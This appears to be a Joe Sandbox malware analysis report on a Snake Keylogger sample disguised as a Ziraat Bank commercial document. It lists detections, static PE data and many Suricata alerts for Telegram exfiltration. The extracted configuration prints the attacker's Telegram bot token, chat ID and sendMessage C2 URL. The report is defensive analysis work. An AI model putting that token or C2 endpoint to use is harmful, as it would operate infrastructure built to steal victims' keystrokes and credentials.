          2024-09-26T11:03:07.955933+020028530061A Network Trojan was detected192.168.2.449920149.154.167.220443TCP
          2024-09-26T11:03:09.452036+020028530061A Network Trojan was detected192.168.2.449921149.154.167.220443TCP
          2024-09-26T11:03:10.431546+020028530061A Network Trojan was detected192.168.2.449922149.154.167.220443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc", "Chat_id": "-4209622687", "Version": "5.1"}
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7124.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendMessage"}
          Multi AV Scanner detection for submitted file
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeReversingLabs: Detection: 32%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeJoe Sandbox ML: detected

          Location Tracking

          barindex
          Tries to detect the country of the analysis system (by using the IP)
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49735 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: RRye.pdb source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
          Source: Binary string: RRye.pdbSHA256 source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F33640h3_2_06F33228
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F30D0Eh3_2_06F30B30
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F31698h3_2_06F30B30
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F31AF9h3_2_06F31848
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F32C79h3_2_06F329C8
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F3E961h3_2_06F3E6B8
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06F30673
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F3E0B1h3_2_06F3DE08
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F3F211h3_2_06F3EF68
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F31F59h3_2_06F31CA8
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F32819h3_2_06F32568
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F33640h3_2_06F3356E
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F3D801h3_2_06F3D558
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F3E509h3_2_06F3E260
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F33640h3_2_06F33218
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F3F669h3_2_06F3F3C0
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F3EDB9h3_2_06F3EB10
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06F30854
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06F30040
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F3FAC1h3_2_06F3F818
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F33640h3_2_06F331F8
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F3DC59h3_2_06F3D9B0
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F3D3A9h3_2_06F3D100
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 4x nop then jmp 06F323B9h3_2_06F32108

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49795 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49760 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49804 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49766 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49810 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49758 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49765 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49790 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49767 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49802 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49768 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49784 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49772 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49763 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49791 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49776 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49805 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49757 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49799 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49824 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49785 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49756 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49777 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49821 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49779 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49858 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49783 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49868 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49792 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49809 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49801 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49771 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49761 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49762 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49782 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49835 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49859 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49775 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49812 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49864 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49862 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49872 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49863 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49808 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49817 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49825 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49807 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49831 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49759 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49778 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49815 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49803 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49867 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49886 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49789 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49780 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49818 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49839 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49816 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49855 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49874 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49849 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49829 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49860 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49769 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49847 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49800 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49770 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49764 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49833 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49861 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49880 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49899 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49919 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49879 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49822 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49830 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49901 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49844 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49788 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49869 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49888 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49774 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49838 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49907 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49891 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49900 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49882 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49826 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49848 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49797 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49856 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49890 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49903 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49842 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49914 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49893 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49871 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49827 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49794 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49896 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49841 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49837 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49906 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49865 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49922 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49781 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49845 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49909 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49806 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49787 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49823 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49850 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49913 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49921 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49852 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49786 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49820 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49851 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49875 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49894 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49887 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49917 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49846 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49908 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49857 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49895 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49876 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49881 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49877 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49793 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49897 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49798 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49832 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49828 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49796 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49904 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49814 -> 149.154.167.220:443
